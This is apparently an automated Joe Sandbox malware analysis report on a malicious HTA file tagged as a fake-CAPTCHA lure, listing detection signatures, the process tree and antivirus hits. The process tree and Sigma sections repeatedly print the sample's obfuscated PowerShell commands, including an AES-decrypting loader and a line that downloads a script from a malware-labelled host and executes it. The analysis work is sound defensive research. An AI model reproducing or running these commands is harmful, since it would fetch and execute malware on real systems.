Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lalaloopy.hta

Overview

General Information

Sample name:lalaloopy.hta
Analysis ID:1633868
MD5:37e8f69d73e92577d78e2c4f5ccd5d19
SHA1:920cfae3eace232359210e6c6f685570437572ff
SHA256:c736d44134d6e443706c1db36bd6b37981f57a47ba2c45a3dc0457f17c63f237
Tags:FakeCaptchahtauser-malrpt
Infos:

Detection

Score:76
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6816 cmdline: mshta.exe "C:\Users\user\Desktop\lalaloopy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 564 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7156JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious MSHTA Child Process
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock
    Sigma detected: PowerShell Web Download
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') , CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7156, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') , ProcessId: 564, ProcessName: powershell.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') , CommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7156, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') , ProcessId: 564, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock
    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock($UnMqFGPoo,0,$UnMqFGPoo.Length)); & $AwWt.Substring(0,3) $AwWt.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function KvftJ($weHZ){-split($weHZ -replace '..', '0x$& ')};$UnMqFGPoo=KvftJ('620986383D3DFAD70991FFD7FE68BB1A4C7AAAF28C506BCDF3F15F05FF68BE3A63C41C1344030F279BA099867889EC40A13815F6C3AA7DB791480C369C06795CBF5C7123F251677434E1D735ADD7491972A4B8BB7C72126D19B19FA0F5CC454183B5CA613DB9749B7A057F46C7D498C1B093495CAEE0D3E9A11FC6A4151C601E17EE5673011BDBA93FDE02DE782233A7043BF49654B970ADAE05C1330E6A3199124AEF9374B3A993D86DD9FEE616A971A5625F90C5378E5B92A2241DD728E9BDA316656189951D0B7C26D79C0709FEBF5245E7EFD6B6E6CB91ECB4FF1C782878D4FADD937AEEB5925AF95C6AFF5FAB094BAD672D12D47A7BB427EFAE835F7CDD46114FA0531292DCB1A82508ECF719EDEC6D556A6010E5E3F8285C641DF98887510875500BD33B137A114B9AE1E8FFD7BFD38CD20E845F94E6ECA7240E7DD766768DE33580115085BB1BF7BE754CA76DFB25FBB67F1FD69B68F02ABE7E019CBD16A364DA8B02F2EB10A0D3077229356FA8DD4CA57A654CDA196E6BE7057EC0E026CA0F3254288FEE7D7852C8A0C4F5EEFA4AFCFFE45E5CF2DE47A71487A38D65C0243902C7D78CF4F213D43497DD7AB9E9807CDBF3F223C051810449AABD687C068E56FDA923D53253D5E025AD605FD5794135CFE260E673F8BCA9A110F0A3F19479DEDED55D4CEC120D4F50A2A96F594CCBD88BA83226B73962DFEF39766364CE4F5FDC9A9CA599D61A6BCEF948A0643BC72BD335FFB29C45EB66186289C3F3A23987D3FFC2FC048F4B82E039CF4B61');$AwWt=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KvftJ('685677414C7863477477484E4E484643')),[byte[]]::new(16)).TransformFinalBlock

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://x72.eioae.shop/413a42a4Avira URL Cloud: Label: malware
    Source: http://x72.eioae.shopAvira URL Cloud: Label: malware
    Source: https://x72.eioae.shopAvira URL Cloud: Label: malware
    Source: https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xllAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: lalaloopy.htaVirustotal: Detection: 28%Perma Link
    Source: lalaloopy.htaReversingLabs: Detection: 18%
    Joe Sandbox ML detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
    Source: unknownHTTPS traffic detected: 172.67.173.214:443 -> 192.168.2.6:49687 version: TLS 1.2
    Source: Binary string: .pdb8 source: powershell.exe, 00000006.00000002.1330449219.00000000077A5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1330449219.00000000077A5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.1324634945.00000000030C2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.1330203482.000000000776E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1324634945.000000000303B000.00000004.00000020.00020000.00000000.sdmp
